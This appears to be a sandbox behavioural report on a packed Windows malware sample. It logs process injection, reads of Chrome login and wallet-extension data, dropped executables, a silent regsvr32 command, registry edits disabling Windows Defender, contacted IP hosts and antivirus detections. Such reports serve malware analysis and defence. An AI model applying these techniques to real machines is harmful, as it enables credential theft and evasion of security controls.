allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077719810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771a810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771b810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771c810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771d810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771e810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771f810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077720810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077721810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077722810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077723810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077724810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077725810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077726810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077727810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077728810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077729810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772a810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772b810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772c810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772d810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772e810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772f810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077730810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077731810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077732810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077733810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077734810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077735810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077736810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077737810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077738810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077739810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007773a810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007773b810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007773c810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007773d810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007773e810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007773f810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077740810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077741810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077742810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0
description WWW14_64.exe tried to sleep 193 seconds, actually delayed analysis time by 193 seconds
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
name RT_ICON language LANG_JAPANESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_DEFAULT offset 0x00f1d368 size 0x00000468
name RT_ICON language LANG_JAPANESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_DEFAULT offset 0x00f1d368 size 0x00000468
name RT_ICON language LANG_JAPANESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_DEFAULT offset 0x00f1d368 size 0x00000468
name RT_ICON language LANG_JAPANESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_DEFAULT offset 0x00f1d368 size 0x00000468
name RT_ICON language LANG_JAPANESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_DEFAULT offset 0x00f1d368 size 0x00000468
name RT_ICON language LANG_JAPANESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_DEFAULT offset 0x00f1d368 size 0x00000468
name RT_GROUP_ICON language LANG_JAPANESE filetype data sublanguage SUBLANG_DEFAULT offset 0x00f1d7d0 size 0x0000005a
domain ipinfo.io
file C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe
file C:\Users\test22\Pictures\Minor Policy\Qsk2lEb1POrkiATkW1TvHjJx.exe
file C:\Users\test22\Pictures\Minor Policy\o2mnUNqs4hnoxF2fH15yb1Si.exe
file C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe
file C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe
file C:\Users\test22\Pictures\Minor Policy\9gJPiBlAGORHTZJCQ72APR4K.exe
file C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe
file C:\Users\test22\Pictures\Minor Policy\4UQYE4n3ZYac371Rz_QX1L7n.exe
file C:\Users\test22\Pictures\Minor Policy\OBFJzEOXCKuSMiLDIstThHOE.exe
file C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe
file C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe
file C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe
file C:\Users\test22\Pictures\Minor Policy\rRBwy4sa0uuFBL7ETAy2ubW2.exe
file C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe
Time & API Arguments Status Return Repeated

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Windows\System32\GroupPolicy
filepath: C:\Windows\System32\GroupPolicy
1 1 0

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Windows\System32\GroupPolicy
filepath: C:\Windows\System32\GroupPolicy
1 1 0
cmdline regsvr32 -s F652w.85
cmdline "C:\Windows\System32\regsvr32.exe" -s F652w.85
file C:\Users\test22\AppData\Local\Temp\F652w.85
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe
parameters:
filepath: C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe
parameters:
filepath: C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe
parameters:
filepath: C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe
parameters:
filepath: C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe
parameters:
filepath: C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe
parameters:
filepath: C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe
parameters:
filepath: C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe
parameters:
filepath: C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer:
request_handle: 0x0000000000cc0078
1 1 0

InternetReadFile

buffer:
request_handle: 0x0000000000cc003c
1 1 0

InternetReadFile

buffer:
request_handle: 0x0000000000cc0060
1 1 0
section .vmp2 size_of_data 0x0075f800 virtual_address 0x0079d000 virtual_size 0x0075f72c entropy 7.943166872330778 description A section with a high entropy has been found
entropy 0.982816974746 description Overall entropy of this PE file is high
process www14_64.exe
process jo0kmib4n4zjs9aogznw9fml.exe
description PWS Memory rule Generic_PWS_Memory_Zero
description Communications smtp rule Network_SMTP_dotNet
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
section .vmp0 description Section name indicates VMProtect
section .vmp1 description Section name indicates VMProtect
section .vmp2 description Section name indicates VMProtect
buffer Buffer with sha1: a418aea92de23ff7cb8d878f95d2ec026d89c636
host 176.123.9.85
host 185.225.73.32
host 185.225.74.51
host 193.42.32.118
host 45.15.156.229
host 45.9.74.80
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 368640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000004c
1 0 0
file C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe
file C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe
file C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe
file C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe
file C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe
file C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe
file C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe
file C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 1960
process_handle: 0x0000004c
1 1 0
Bkav W32.AIDetectMalware.64
Elastic malicious (high confidence)
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win64/Packed.VMProtect.J suspicious
APEX Malicious
McAfee-GW-Edition BehavesLike.Win64.Generic.wc
FireEye Generic.mg.24fbc8705072bb32
Microsoft Trojan:Win32/Sabsik.FL.B!ml
MaxSecure Trojan.Malware.300983.susgen
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_70% (D)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
process WWW14_64.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
process nbHH0jE8qZJ4tNguvouaT8ug.exe useragent HTTPREAD
Process injection Process 2932 called NtSetContextThread to modify thread in remote process 1960
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2005598660
registers.esp: 6618964
registers.edi: 0
registers.eax: 4510638
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000048
process_identifier: 1960
1 0 0
Process injection Process 2732 resumed a thread in remote process 2140
Process injection Process 2932 resumed a thread in remote process 1960
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 2140
1 0 0

NtResumeThread

thread_handle: 0x00000048
suspend_count: 1
process_identifier: 1960
1 0 0
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
